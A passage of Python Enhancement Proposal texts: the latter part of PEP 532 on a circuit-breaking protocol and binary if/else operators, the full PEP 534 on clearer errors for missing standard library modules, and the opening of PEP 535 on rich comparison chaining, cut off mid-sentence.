VALUE if and trailing else VALUE clauses can be omitted as implied in
expressions of the following forms:
# To handle "if" expressions, " else VALUE" is implied when omitted
EXPR if is_sentinel(VALUE, SENTINEL) else VALUE
EXPR if is_not_sentinel(VALUE, SENTINEL) else VALUE
# To handle "else" expressions, "VALUE if " is implied when omitted
VALUE if is_sentinel(VALUE, SENTINEL) else EXPR
VALUE if is_not_sentinel(VALUE, SENTINEL) else EXPR
The proposed types.CircuitBreaker type would represent this behaviour
programmatically as follows:
class CircuitBreaker:
    """Simple circuit breaker type"""
    def __init__(self, value, bool_value):
        self.value = value
        self.bool_value = bool(bool_value)
    def __bool__(self):
        return self.bool_value
    def __not__(self):
        return CircuitBreaker(self.value, not self.bool_value)
    def __then__(self, result):
        if result is self:
            return self.value
        return result
    def __else__(self, result):
        if result is self:
            return self.value
        return result
The key characteristic of these circuit breakers is that they are ephemeral:
when they are told that short circuiting has taken place (by receiving a
reference to themselves as the candidate expression result), they return the
original value, rather than the circuit breaking wrapper.
The short-circuiting detection is defined such that the wrapper will always
be removed if you explicitly pass the same circuit breaker instance to both
sides of a circuit breaking operator or use one as all three operands in a
conditional expression:
breaker = types.CircuitBreaker(foo, foo is None)
assert operator.short_circuit(breaker) is foo
assert (breaker if breaker) is foo
assert (breaker else breaker) is foo
assert (breaker if breaker else breaker) is foo
breaker = types.CircuitBreaker(foo, foo is not None)
assert operator.short_circuit(breaker) is foo
assert (breaker if breaker) is foo
assert (breaker else breaker) is foo
assert (breaker if breaker else breaker) is foo
The factory functions in the operator module would then make it
straightforward to create circuit breakers that correspond to identity
checks using the is and is not operators:
def is_sentinel(value, sentinel):
    """Returns a circuit breaker switching on 'value is sentinel'"""
    return types.CircuitBreaker(value, value is sentinel)

def is_not_sentinel(value, sentinel):
    """Returns a circuit breaker switching on 'value is not sentinel'"""
    return types.CircuitBreaker(value, value is not sentinel)
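Assuming types.CircuitBreaker behaved like the pure-Python sketch shown above,
basic usage of these factories might look like the following (illustrative only;
neither the type nor the factories exist today):
value = None
breaker = is_not_sentinel(value, None)  # switches on "value is not None"
assert bool(breaker) is False           # the check fails for None ...
assert breaker.value is None            # ... but the original value stays reachable

breaker = is_not_sentinel(42, None)
assert bool(breaker) is True            # 42 is not None, so the check succeeds
assert breaker.value == 42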
Truth checking comparisons
Due to their short-circuiting nature, the runtime logic underlying the and
and or operators has never previously been accessible through the
operator or types modules.
The introduction of circuit breaking operators and circuit breakers allows
that logic to be captured in the operator module as follows:
def true(value):
    """Returns a circuit breaker switching on 'bool(value)'"""
    return types.CircuitBreaker(value, bool(value))

def false(value):
    """Returns a circuit breaker switching on 'not bool(value)'"""
    return types.CircuitBreaker(value, not bool(value))
LHS or RHS would be effectively true(LHS) else RHS
LHS and RHS would be effectively false(LHS) else RHS
No actual change would take place in these operator definitions, the new
circuit breaking protocol and operators would just provide a way to make the
control flow logic programmable, rather than hardcoding the sense of the check
at development time.
Respecting the rules of boolean logic, these expressions could also be
expanded in their inverted form by using the right-associative circuit
breaking operator instead:
LHS or RHS would be effectively RHS if false(LHS)
LHS and RHS would be effectively RHS if true(LHS)
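As a concrete, purely illustrative sanity check (again assuming the pure-Python
CircuitBreaker sketch and the true() factory above), the two cases of the or
equivalence can be traced by hand:
lhs = ""                       # falsy, so "lhs or rhs" yields rhs
breaker = true(lhs)            # bool(breaker) is False
assert breaker.__else__("fallback") == "fallback"   # else branch passes rhs through

lhs = "x"                      # truthy, so "lhs or rhs" yields lhs
breaker = true(lhs)            # bool(breaker) is True
assert breaker.__then__(breaker) == "x"              # short-circuit unwraps lhs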
None-aware operators
If both this PEP and PEP 505’s None-aware operators were accepted, then the
proposed is_sentinel and is_not_sentinel circuit breaker factories
would be used to encapsulate the notion of “None checking”: seeing if a value
is None and either falling back to an alternative value (an operation known
as “None-coalescing”) or passing it through as the result of the overall
expression (an operation known as “None-severing” or “None-propagating”).
Given these circuit breakers, LHS ?? RHS would be roughly equivalent to
both of the following:
is_not_sentinel(LHS, None) else RHS
RHS if is_sentinel(LHS, None)
Due to the way they inject control flow into attribute lookup and subscripting
operations, None-aware attribute access and None-aware subscripting can’t be
expressed directly in terms of the circuit breaking operators, but they can
still be defined in terms of the underlying circuit breaking protocol.
In those terms, EXPR?.ATTR[KEY].SUBATTR() would be semantically
equivalent to:
_lookup_base = EXPR
_circuit_breaker = is_not_sentinel(_lookup_base, None)
_expr_result = _lookup_base.ATTR[KEY].SUBATTR() if _circuit_breaker
Similarly, EXPR?[KEY].ATTR.SUBATTR() would be semantically equivalent
to:
_lookup_base = EXPR
_circuit_breaker = is_not_sentinel(_lookup_base, None)
_expr_result = _lookup_base[KEY].ATTR.SUBATTR() if _circuit_breaker
The actual implementations of the None-aware operators would presumably be
optimised to skip actually creating the circuit breaker instance, but the
above expansions would still provide an accurate description of the observable
behaviour of the operators at runtime.
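For the default None sentinel, the observable behaviour of the attribute access
case reduces to something like the following plain helper (illustrative only;
the real operators would be compiled directly and would never evaluate the base
expression twice):
def none_aware_getattr(base, attr):
    # Roughly what EXPR?.attr is described as doing for the None sentinel
    return getattr(base, attr) if base is not None else None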
Rich chained comparisons
Refer to PEP 535 for a detailed discussion of this possible use case.
Other conditional constructs
No changes are proposed to if statements, while statements, comprehensions,
or generator expressions, as the boolean clauses they contain are used
entirely for control flow purposes and never return a result as such.
However, it’s worth noting that while such proposals are outside the scope of
this PEP, the circuit breaking protocol defined here would already be
sufficient to support constructs like:
def is_not_none(obj):
    return is_not_sentinel(obj, None)

while is_not_none(dynamic_query()) as result:
    ... # Code using result
and:
if is_not_none(re.search(pattern, text)) as match:
    ... # Code using match
This could be done by assigning the result of
operator.short_circuit(CONDITION) to the name given in the as clause,
rather than assigning CONDITION to the given name directly.
Style guide recommendations
The following additions to PEP 8 are proposed in relation to the new features
introduced by this PEP:
Avoid combining conditional expressions (if-else) and the standalone
circuit breaking operators (if and else) in a single expression -
use one or the other depending on the situation, but not both.
Avoid using conditional expressions (if-else) and the standalone
circuit breaking operators (if and else) as part of if
conditions in if statements and the filter clauses of comprehensions
and generator expressions.
Rationale
Adding new operators
Similar to PEP 335, early drafts of this PEP focused on making the existing
and and or operators less rigid in their interpretation, rather than
proposing new operators. However, this proved to be problematic for a few key
reasons:
the and and or operators have a long established and stable meaning,
so readers would inevitably be surprised if their meaning now became
dependent on the type of the left operand. Even new users would be confused
by this change due to 25+ years of teaching material that assumes the
current well-known semantics for these operators
Python interpreter implementations, including CPython, have taken advantage
of the existing semantics of and and or when defining runtime and
compile time optimisations, which would all need to be reviewed and
potentially discarded if the semantics of those operations changed
it isn’t clear what names would be appropriate for the new methods needed
to define the protocol
Proposing short-circuiting binary variants of the existing if-else ternary
operator instead resolves all of those issues:
the runtime semantics of and and or remain entirely unchanged
while the semantics of the unary not operator do change, the invariant
required of __not__ implementations means that existing expression
optimisations in boolean contexts will remain valid.
__else__ is the short-circuiting outcome for if expressions due to
the absence of a trailing else clause
__then__ is the short-circuiting outcome for else expressions due to
the absence of a leading if clause (this connection would be even clearer
if the method name was __if__, but that would be ambiguous given the
other uses of the if keyword that won’t invoke the circuit breaking
protocol)
Naming the operator and protocol
The names “circuit breaking operator”, “circuit breaking protocol” and
“circuit breaker” are all inspired by the phrase “short circuiting operator”:
the general language design term for operators that only conditionally
evaluate their right operand.
The electrical analogy is that circuit breakers in Python detect and handle
short circuits in expressions before they trigger any exceptions similar to the
way that circuit breakers detect and handle short circuits in electrical
systems before they damage any equipment or harm any humans.
The Python level analogy is that just as a break statement lets you
terminate a loop before it reaches its natural conclusion, a circuit breaking
expression lets you terminate evaluation of the expression and produce a result
immediately.
Using existing keywords
Using existing keywords has the benefit of allowing the new operators to
be introduced without a __future__ statement.
if and else are semantically appropriate for the proposed new protocol,
and the only additional syntactic ambiguity introduced arises when the new
operators are combined with the explicit if-else conditional expression
syntax.
The PEP handles that ambiguity by explicitly specifying how it should be
handled by interpreter implementers, but proposing to point out in PEP 8
that even though interpreters will understand it, human readers probably
won’t, and hence it won’t be a good idea to use both conditional expressions
and the circuit breaking operators in a single expression.
Naming the protocol methods
Naming the __else__ method was straightforward, as reusing the operator
keyword name results in a special method name that is both obvious and
unambiguous.
Naming the __then__ method was less straightforward, as there was another
possible option in using the keyword-based name __if__.
The problem with __if__ is that there would continue to be many cases
where the if keyword appeared, with an expression to its immediate right,
but the __if__ special method would not be invoked. Instead, the
bool() builtin and its underlying special methods (__bool__,
__len__) would be invoked, while __if__ had no effect.
With the boolean protocol already playing a part in conditional expressions and
the new circuit breaking protocol, the less ambiguous name __then__ was
chosen based on the terminology commonly used in computer science and
programming language design to describe the first clause of an if
statement.
Making binary if right-associative
The precedent set by conditional expressions means that a binary
short-circuiting if expression must necessarily have the condition on the
right as a matter of consistency.
With the right operand always being evaluated first, and the left operand not
being evaluated at all if the right operand is false in a boolean context,
the natural outcome is a right-associative operator.
Naming the standard circuit breakers
When used solely with the left-associative circuit breaking operator,
explicit circuit breaker names for unary checks read well if they start with
the preposition if_:
operator.if_true(LHS) else RHS
operator.if_false(LHS) else RHS
However, incorporating the if_ doesn’t read as well when performing
logical inversion:
not operator.if_true(LHS) else RHS
not operator.if_false(LHS) else RHS
Or when using the right-associative circuit breaking operator:
LHS if operator.if_true(RHS)
LHS if operator.if_false(RHS)
Or when naming a binary comparison operation:
operator.if_is_sentinel(VALUE, SENTINEL) else EXPR
operator.if_is_not_sentinel(VALUE, SENTINEL) else EXPR
By contrast, omitting the preposition from the circuit breaker name gives a
result that reads reasonably well in all forms for unary checks:
operator.true(LHS) else RHS # Preceding "LHS if " implied
operator.false(LHS) else RHS # Preceding "LHS if " implied
not operator.true(LHS) else RHS # Preceding "LHS if " implied
not operator.false(LHS) else RHS # Preceding "LHS if " implied
LHS if operator.true(RHS) # Trailing " else RHS" implied
LHS if operator.false(RHS) # Trailing " else RHS" implied
LHS if not operator.true(RHS) # Trailing " else RHS" implied
LHS if not operator.false(RHS) # Trailing " else RHS" implied
And also reads well for binary checks:
operator.is_sentinel(VALUE, SENTINEL) else EXPR
operator.is_not_sentinel(VALUE, SENTINEL) else EXPR
EXPR if operator.is_sentinel(VALUE, SENTINEL)
EXPR if operator.is_not_sentinel(VALUE, SENTINEL)
Risks and concerns
This PEP has been designed specifically to address the risks and concerns
raised when discussing PEPs 335, 505 and 531.
it defines new operators and adjusts the definition of chained comparison
(in a separate PEP) rather than impacting the existing and and or
operators
the proposed new operators are general purpose short-circuiting binary
operators that can even be used to express the existing semantics of and
and or rather than focusing solely and inflexibly on identity checking
against None
the changes to the not unary operator and the is and is not
binary comparison operators are defined in such a way that control flow
optimisations based on the existing semantics remain valid
One consequence of this approach is that this PEP on its own doesn’t produce
much in the way of direct benefits to end users aside from making it possible
to omit some common None if prefixes and else None suffixes from
particular forms of conditional expression.
Instead, what it mainly provides is a common foundation that would allow the
None-aware operator proposals in PEP 505 and the rich comparison chaining
proposal in PEP 535 to be pursued atop a common underlying semantic framework
that would also be shared with conditional expressions and the existing and
and or operators.
Design Discussion
Protocol walk-through
The following diagram illustrates the core concepts behind the circuit
breaking protocol (although it glosses over the technical detail of looking
up the special methods via the type rather than the instance):
We will work through the following expression:
>>> def is_not_none(obj):
...     return operator.is_not_sentinel(obj, None)
>>> x if is_not_none(data.get("key")) else y
is_not_none is a helper function that invokes the proposed
operator.is_not_sentinel types.CircuitBreaker factory with None as
the sentinel value. data is a container (such as a builtin dict
instance) that returns None when the get() method is called with an
unknown key.
We can rewrite the example to give a name to the circuit breaker instance:
>>> maybe_value = is_not_none(data.get("key"))
>>> x if maybe_value else y
Here the maybe_value circuit breaker instance corresponds to breaker
in the diagram.
The ternary condition is evaluated by calling bool(maybe_value), which is
the same as Python’s existing behavior. The change in behavior is that instead
of directly returning one of the operands x or y, the circuit breaking
protocol passes the relevant operand to the circuit breaker used in the
condition.
If bool(maybe_value) evaluates to True (i.e. the requested
key exists and its value is not None) then the interpreter calls
type(maybe_value).__then__(maybe_value, x). Otherwise, it calls
type(maybe_value).__else__(maybe_value, y).
The protocol also applies to the new if and else binary operators,
but in these cases, the interpreter needs a way to indicate the missing third
operand. It does this by re-using the circuit breaker itself in that role.
Consider these two expressions:
>>> x if data.get("key") is None
>>> x if operator.is_sentinel(data.get("key"), None)
The first form of this expression returns x if data.get("key") is None,
but otherwise returns False, which almost certainly isn’t what we want.
By contrast, the second form of this expression still returns x if
data.get("key") is None, but otherwise returns data.get("key"), which
is significantly more useful behaviour.
We can understand this behavior by rewriting it as a ternary expression with
an explicitly named circuit breaker instance:
>>> maybe_value = operator.is_sentinel(data.get("key"), None)
>>> x if maybe_value else maybe_value
If bool(maybe_value) is True (i.e. data.get("key") is None),
then the interpreter calls type(maybe_value).__then__(maybe_value, x). The
implementation of types.CircuitBreaker.__then__ doesn’t see anything that
indicates short-circuiting has taken place, and hence returns x.
By contrast, if bool(maybe_value) is False (i.e. data.get("key")
is not None), the interpreter calls
type(maybe_value).__else__(maybe_value, maybe_value). The implementation of
types.CircuitBreaker.__else__ detects that the instance method has received
itself as its argument and returns the wrapped value (i.e. data.get("key"))
rather than the circuit breaker.
The same logic applies to else, only reversed:
>>> is_not_none(data.get("key")) else y
This expression returns data.get("key") if it is not None, otherwise it
evaluates and returns y. To understand the mechanics, we rewrite the
expression as follows:
>>> maybe_value = is_not_none(data.get("key"))
>>> maybe_value if maybe_value else y
If bool(maybe_value) is True, then the expression short-circuits and
the interpreter calls type(maybe_value).__then__(maybe_value, maybe_value).
The implementation of types.CircuitBreaker.__then__ detects that the
instance method has received itself as its argument and returns the wrapped
value (i.e. data.get("key")) rather than the circuit breaker.
If bool(maybe_value) is False, the interpreter calls
type(maybe_value).__else__(maybe_value, y). The implementation of
types.CircuitBreaker.__else__ doesn’t see anything that indicates
short-circuiting has taken place, and hence returns y.
Respecting De Morgan’s Laws
Similar to and and or, the binary short-circuiting operators will
permit multiple ways of writing essentially the same expression. This
seeming redundancy is unfortunately an implied consequence of defining the
protocol as a full boolean algebra, as boolean algebras respect a pair of
properties known as “De Morgan’s Laws”: the ability to express the results
of and and or operations in terms of each other and a suitable
combination of not operations.
For and and or in Python, these invariants can be described as follows:
assert bool(A and B) == bool(not (not A or not B))
assert bool(A or B) == bool(not (not A and not B))
That is, if you take one of the operators, invert both operands, switch to the
other operator, and then invert the overall result, you’ll get the same
answer (in a boolean sense) as you did from the original operator. (This may
seem redundant, but in many situations it actually lets you eliminate double
negatives and find tautologically true or false subexpressions, thus reducing
the overall expression size).
For circuit breakers, defining a suitable invariant is complicated by the
fact that they’re often going to be designed to eliminate themselves from the
expression result when they’re short-circuited, which is an inherently
asymmetric behaviour. Accordingly, that inherent asymmetry needs to be
accounted for when mapping De Morgan’s Laws to the expected behaviour of
symmetric circuit breakers.
One way this complication can be addressed is to wrap the operand that would
otherwise short-circuit in operator.true, ensuring that when bool is
applied to the overall result, it uses the same definition of truth that was
used to decide which branch to evaluate, rather than applying bool directly
to the circuit breaker’s input value.
Specifically, for the new short-circuiting operators, the following properties
would be reasonably expected to hold for any well-behaved symmetric circuit
breaker that implements both __bool__ and __not__:
assert bool(B if true(A)) == bool(not (true(not A) else not B))
assert bool(true(A) else B) == bool(not (not B if true(not A)))
Note the order of operations on the right hand side (applying true
after inverting the input circuit breaker) - this ensures that an
assertion is actually being made about type(A).__not__, rather than
merely being about the behaviour of type(true(A)).__not__.
At the very least, types.CircuitBreaker instances would respect this
logic, allowing existing boolean expression optimisations (like double
negative elimination) to continue to be applied.
Arbitrary sentinel objects
Unlike PEPs 505 and 531, the proposal in this PEP readily handles custom
sentinel objects:
_MISSING = object()

# Using the sentinel to check whether or not an argument was supplied
def my_func(arg=_MISSING):
    arg = make_default() if is_sentinel(arg, _MISSING) # "else arg" implied
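For comparison, and purely as an illustration, the same check spelled out with
today's syntax (make_default is assumed to be defined elsewhere):
def my_func(arg=_MISSING):
    arg = make_default() if arg is _MISSING else arg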
Implicitly defined circuit breakers in circuit breaking expressions
A never-posted draft of this PEP explored the idea of special casing the
is and is not binary operators such that they were automatically
treated as circuit breakers when used in the context of a circuit breaking
expression. Unfortunately, it turned out that this approach necessarily
resulted in one of two highly undesirable outcomes:
the return type of these expressions changed universally from bool to
types.CircuitBreaker, potentially creating a backwards compatibility
problem (especially when working with extension module APIs that
specifically look for a builtin boolean value with PyBool_Check rather
than passing the supplied value through PyObject_IsTrue or using
the p (predicate) format in one of the argument parsing functions)
the return type of these expressions became context dependent, meaning
that other routine refactorings (like pulling a comparison operation out
into a local variable) could have a significant impact on the runtime
semantics of a piece of code
Neither of those possible outcomes seems warranted by the proposal in this PEP,
so it reverted to the current design where circuit breaker instances must be
created explicitly via API calls, and are never produced implicitly.
Implementation
As with PEP 505, actual implementation has been deferred pending in-principle
interest in the idea of making these changes.
…TBD…
Acknowledgements
Thanks go to Steven D’Aprano for his detailed critique [2] of the initial
draft of this PEP that inspired many of the changes in the second draft, as
well as to all of the other participants in that discussion thread [3].
References
[1]
PEP 335 rejection notification
(https://mail.python.org/pipermail/python-dev/2012-March/117510.html)
[2]
Steven D’Aprano’s critique of the initial draft
(https://mail.python.org/pipermail/python-ideas/2016-November/043615.html)
[3]
python-ideas thread discussing initial draft
(https://mail.python.org/pipermail/python-ideas/2016-November/043563.html)
Copyright
This document has been placed in the public domain under the terms of the
CC0 1.0 license: https://creativecommons.org/publicdomain/zero/1.0/
| Deferred | PEP 532 – A circuit breaking protocol and binary operators | Standards Track | Inspired by PEP 335, PEP 505, PEP 531, and the related discussions, this PEP
proposes the definition of a new circuit breaking protocol (using the
method names __then__ and __else__) that provides a common underlying
semantic foundation for: |
PEP 534 – Improved Errors for Missing Standard Library Modules
Author:
Tomáš Orsava <tomas.n at orsava.cz>,
Petr Viktorin <encukou at gmail.com>,
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Deferred
Type:
Standards Track
Created:
05-Sep-2016
Post-History:
Table of Contents
Abstract
PEP Deferral
Motivation
CPython
Linux and other distributions
Specification
APIs to list expected standard library modules
Changes to the default sys.excepthook implementation
Design Discussion
Modifying sys.excepthook
Public API to query expected standard library module names
Only including top level module names
Listing private top level module names as optional standard library modules
Deeming packaging related modules to be mandatory
Deferred Ideas
Platform dependent modules
Emitting a warning when __main__ shadows a standard library module
Recommendation for Downstream Distributors
Backwards Compatibility
Reference and Example Implementation
Notes and References
Copyright
Abstract
Python is often being built or distributed without its full standard library.
However, there is as of yet no standard, user friendly way of properly
informing the user about the failure to import such missing standard library
modules.
This PEP proposes a mechanism for identifying expected standard library modules
and providing more informative error messages to users when attempts to import
standard library modules fail.
PEP Deferral
The PEP authors aren’t actively working on this PEP, so if improving these
error messages is an idea that you’re interested in pursuing, please get in
touch! (e.g. by posting to the python-dev mailing list).
The key piece of open work is determining how to get the autoconf and Visual
Studio build processes to populate the sysconfig metadata file with the lists
of expected and optional standard library modules.
Motivation
There are several use cases for including only a subset of Python’s standard
library. However, there is so far no user-friendly mechanism for informing
the user why a stdlib module is missing and how to remedy the situation
appropriately.
CPython
When one of Python’s standard library modules (such as _sqlite3) cannot be
compiled during a CPython build because of missing dependencies (e.g. SQLite
header files), the module is simply skipped. If you then install this compiled
Python and use it to try to import one of the missing modules, Python will fail
with a ModuleNotFoundError.
For example, after deliberately removing sqlite-devel from the local
system:
$ ./python -c "import sqlite3"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/home/ncoghlan/devel/cpython/Lib/sqlite3/__init__.py", line 23, in <module>
from sqlite3.dbapi2 import *
File "/home/ncoghlan/devel/cpython/Lib/sqlite3/dbapi2.py", line 27, in <module>
from _sqlite3 import *
ModuleNotFoundError: No module named '_sqlite3'
This can confuse users who may not understand why a cleanly built Python is
missing standard library modules.
Linux and other distributions
Many Linux and other distributions are already separating out parts of the
standard library to standalone packages. Among the most commonly excluded
modules are the tkinter module, since it draws in a dependency on the
graphical environment, idlelib, since it depends on tkinter (and most
Linux desktop environments provide their own default code editor), and the
test package, as it only serves to test Python internally and is about as
big as the rest of the standard library put together.
The methods of omission of these modules differ. For example, Debian patches
the file Lib/tkinter/__init__.py to envelop the line import _tkinter in
a try-except block and upon encountering an ImportError it simply adds
the following to the error message: please install the python3-tk package
[1]. Fedora and other distributions simply don’t include the
omitted modules, potentially leaving users baffled as to where to find them.
An example from Fedora 29:
$ python3 -c "import tkinter"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: No module named 'tkinter'
Specification
APIs to list expected standard library modules
To allow for easier identification of which module names are expected to be
resolved in the standard library, the sysconfig module will be extended
with two additional functions:
sysconfig.get_stdlib_modules(), which will provide a list of the names of
all top level Python standard library modules (including private modules)
sysconfig.get_optional_modules(), which will list optional public top level
standard library module names
The results of sysconfig.get_optional_modules() and the existing
sys.builtin_module_names will both be subsets of the full list provided by
the new sysconfig.get_stdlib_modules() function.
These added lists will be generated during the Python build process and saved in
the _sysconfigdata-*.py file along with other sysconfig values.
Possible reasons for modules being in the “optional” list will be:
the module relies on an optional build dependency (e.g. _sqlite3,
tkinter, idlelib)
the module is private for other reasons and hence may not be present on all
implementations (e.g. _freeze_importlib, _collections_abc)
the module is platform specific and hence may not be present in all
installations (e.g. winreg)
the test package may also be freely omitted from Python runtime
installations, as it is intended for use in testing Python implementations,
not as a runtime library for Python projects to use (the public API offering
testing utilities is unittest)
(Note: the ensurepip, venv, and distutils modules are all considered
mandatory modules in this PEP, even though not all redistributors currently
adhere to that practice)
Changes to the default sys.excepthook implementation
The default implementation of the sys.excepthook function will then be
modified to dispense an appropriate message when it detects a failure to
import a module identified by one of the two new sysconfig functions as
belonging to the Python standard library.
Revised error message for a module that relies on an optional build dependency
or is otherwise considered optional when Python is installed:
$ ./python -c "import sqlite3"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/home/ncoghlan/devel/cpython/Lib/sqlite3/__init__.py", line 23, in <module>
from sqlite3.dbapi2 import *
File "/home/ncoghlan/devel/cpython/Lib/sqlite3/dbapi2.py", line 27, in <module>
from _sqlite3 import *
ModuleNotFoundError: Optional standard library module '_sqlite3' was not found
Revised error message for a submodule of an optional top level package when the
entire top level package is missing:
$ ./python -c "import test.regrtest"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: Optional standard library module 'test' was not found
Revised error message for a submodule of an optional top level package when the
top level package is present:
$ ./python -c "import test.regrtest"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: No submodule named 'test.regrtest' in optional standard library module 'test'
Revised error message for a module that is always expected to be available:
$ ./python -c "import ensurepip"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: Standard library module 'ensurepip' was not found
Revised error message for a missing submodule of a standard library package when
the top level package is present:
$ ./python -c "import encodings.mbcs"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: No submodule named 'encodings.mbcs' in standard library module 'encodings'
These revised error messages make it clear that the missing modules are expected
to be available from the standard library, but are not available for some reason,
rather than being an indicator of a missing third party dependency in the current
environment.
Design Discussion
Modifying sys.excepthook
The sys.excepthook function gets called when a raised exception is uncaught
and the program is about to exit or (in an interactive session) the control is
being returned to the prompt. This makes it a perfect place for customized
error messages, as it will not influence caught errors and thus not slow down
normal execution of Python scripts.
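The general shape of such a customisation can already be sketched with existing
APIs. In the sketch below, the module set is a hardcoded placeholder standing in
for the proposed sysconfig data, and the message wording is purely illustrative:
import sys

_EXPECTED_STDLIB = {"tkinter", "sqlite3", "ssl"}  # placeholder for proposed sysconfig data

def _informative_excepthook(exc_type, exc, tb):
    # Augment uncaught ModuleNotFoundError reports for known stdlib names
    if isinstance(exc, ModuleNotFoundError) and exc.name:
        top_level = exc.name.partition(".")[0]
        if top_level in _EXPECTED_STDLIB:
            print("Note: {!r} is expected to be part of the standard library, "
                  "but is not available in this installation.".format(exc.name),
                  file=sys.stderr)
    sys.__excepthook__(exc_type, exc, tb)

sys.excepthook = _informative_excepthook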
Public API to query expected standard library module names
The inclusion of the functions sysconfig.get_stdlib_modules() and
sysconfig.get_optional_modules() will provide a long sought-after
way of easily listing the names of Python standard library modules
[2], which will (among other benefits) make it easier for
code analysis, profiling, and error reporting tools to offer runtime
--ignore-stdlib flags.
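For example, a hypothetical --ignore-stdlib implementation might filter module
names roughly as follows (note that get_stdlib_modules is the API proposed by
this PEP, not something available in current CPython):
import sysconfig

def is_expected_stdlib(module_name):
    # Proposed API: get_stdlib_modules() would return top level names only
    top_level = module_name.partition(".")[0]
    return top_level in sysconfig.get_stdlib_modules()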
Only including top level module names
This PEP proposes that only top level module and package names be reported by
the new query APIs. This is sufficient information to generate the proposed
error messages, reduces the number of required entries by an order of magnitude,
and simplifies the process of generating the related metadata during the build
process.
If this is eventually found to be overly limiting, a new include_submodules
flag could be added to the query APIs. However, this is not part of the initial
proposal, as the benefits of doing so aren’t currently seen as justifying the
extra complexity.
There is one known consequence of this restriction, which is that the new
default excepthook implementation will report incorrect submodule names the
same way that it reports genuinely missing standard library submodules:
$ ./python -c "import unittest.muck"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: No submodule named 'unittest.muck' in standard library module 'unittest'
Listing private top level module names as optional standard library modules
Many of the modules that have an optional external build dependency are written
as hybrid modules, where there is a shared Python wrapper around an
implementation dependent interface to the underlying external library. In other
cases, a private top level module may simply be a CPython implementation detail,
and other implementations may not provide that module at all.
To report import errors involving these modules appropriately, the new default
excepthook implementation needs them to be reported by the new query APIs.
Deeming packaging related modules to be mandatory
Some redistributors aren’t entirely keen on installing the Python specific
packaging related modules (distutils, ensurepip, venv) by default,
preferring that developers use their platform specific tooling instead.
This approach causes interoperability problems for developers working on
cross-platform projects and educators attempting to write platform independent
setup instructions, so this PEP takes the view that these modules should be
considered mandatory, and left out of the list of optional modules.
Deferred Ideas
The ideas in this section are concepts that this PEP would potentially help
enable, but they’re considered out of scope for the initial proposal.
Platform dependent modules
Some standard library modules may be missing because they’re only provided on
particular platforms. For example, the winreg module is only available on
Windows:
$ python3 -c "import winreg"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: No module named 'winreg'
In the current proposal, these platform dependent modules will simply be
included with all the other optional modules rather than attempting to expose
the platform dependency information in a more structured way.
However, the platform dependence is at least tracked at the level of “Windows”,
“Unix”, “Linux”, and “FreeBSD” for the benefit of the documentation, so it
seems plausible that it could potentially be exposed programmatically as well.
Emitting a warning when __main__ shadows a standard library module
Given the new query APIs, the new default excepthook implementation could
potentially detect when __main__.__file__ or __main__.__spec__.name
match a standard library module, and emit a suitable warning.
However, actually doing anything along these lines would first require reviewing
more cases where users actually encounter this problem, together with the various
options for potentially offering more information to assist in debugging the
situation, so it is not incorporated into the current proposal.
Recommendation for Downstream Distributors
By patching site.py [*] to provide their own implementation of the
sys.excepthook function, Python distributors can display tailor-made
error messages for any uncaught exceptions, including informing the user of
a proper, distro-specific way to install missing standard library modules upon
encountering a ModuleNotFoundError.
Some downstream distributors are already using this method of patching
sys.excepthook to integrate with platform crash reporting mechanisms.
Backwards Compatibility
No problems with backwards compatibility are expected. Distributions that are
already patching Python modules to provide custom handling of missing
dependencies can continue to do so unhindered.
Reference and Example Implementation
TBD. The finer details will depend on what’s practical given the capabilities
of the CPython build system (other implementations should then be able to use
the generated CPython data, rather than having to regenerate it themselves).
Notes and References
[*]
Or sitecustomize.py for organizations with their own custom
Python variant.
[1]
http://bazaar.launchpad.net/~doko/python/pkg3.5-debian/view/head:/patches/tkinter-import.diff
[2]
http://stackoverflow.com/questions/6463918/how-can-i-get-a-list-of-all-the-python-standard-library-modules
Ideas leading up to this PEP were discussed on the python-dev mailing list
and subsequently on python-ideas.
Copyright
This document has been placed in the public domain.
| Deferred | PEP 534 – Improved Errors for Missing Standard Library Modules | Standards Track | Python is often being built or distributed without its full standard library.
However, there is as of yet no standard, user friendly way of properly
informing the user about the failure to import such missing standard library
modules. |
PEP 535 – Rich comparison chaining
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Deferred
Type:
Standards Track
Requires:
532
Created:
12-Nov-2016
Python-Version:
3.8
Table of Contents
PEP Deferral
Abstract
Relationship with other PEPs
Specification
Rationale
Implementation
References
Copyright
PEP Deferral
Further consideration of this PEP has been deferred until Python 3.8 at the
earliest.
Abstract
Inspired by PEP 335, and building on the circuit breaking protocol described
in PEP 532, this PEP proposes a change to the definition of chained comparisons,
where the comparison chaining will be updated to use the left-associative
circuit breaking operator (else) rather than the logical conjunction
operator (and) if the left hand comparison returns a circuit breaker as
its result.
While there are some practical complexities arising from the current handling
of single-valued arrays in NumPy, this change should be sufficient to allow
elementwise chained comparison operations for matrices, where the result
is a matrix of boolean values, rather than raising ValueError
or tautologically returning True (indicating a non-empty matrix).
Relationship with other PEPs
This PEP has been extracted from earlier iterations of PEP 532, as a
follow-on use case for the circuit breaking protocol, rather than an essential
part of its introduction.
The specific proposal in this PEP to handle the element-wise comparison use
case by changing the semantic definition of comparison chaining is drawn
directly from Guido’s rejection of PEP 335.
Specification
A chained comparison like 0 < x < 10 written as:
LEFT_BOUND LEFT_OP EXPR RIGHT_OP RIGHT_BOUND
is currently roughly semantically equivalent to:
_expr = EXPR
_lhs_result = LEFT_BOUND LEFT_OP _expr
_expr_result = _lhs_result and (_expr RIGHT_OP RIGHT_BOUND)
Using the circuit breaking concepts introduced in PEP 532, this PEP proposes
that comparison chaining be changed to explicitly check if the left comparison
returns a circuit breaker, and if so, use else rather than and to
implement the comparison chaining:
_expr = EXPR
_lhs_result = LEFT_BOUND LEFT_OP _expr
if hasattr(type(_lhs_result), "__else__"):
    _expr_result = _lhs_result else (_expr RIGHT_OP RIGHT_BOUND)
else:
    _expr_result = _lhs_result and (_expr RIGHT_OP RIGHT_BOUND)
This allows types like NumPy arrays to control the behaviour of chained
